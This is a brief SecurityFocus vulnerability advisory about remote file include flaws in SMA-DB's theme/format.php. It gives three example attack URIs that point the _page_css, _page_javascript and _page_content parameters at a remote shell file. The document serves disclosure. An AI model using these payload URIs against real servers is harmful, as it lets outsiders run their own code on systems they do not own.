SMA-DB 'theme/format.php' Multiple Remote File Include Vulnerabilities

An attacker can exploit these issues via a browser.

The following example URIs are available:

http://www.example.com/path/theme/format.php?_page_css=[shell.txt?]
http://www.example.com//path/theme/format.php?_page_javascript=[shell.txt?]
http://www.example.com//path/theme/format.php?_page_content=[shell.txt?]


 

Privacy Statement
Copyright 2010, SecurityFocus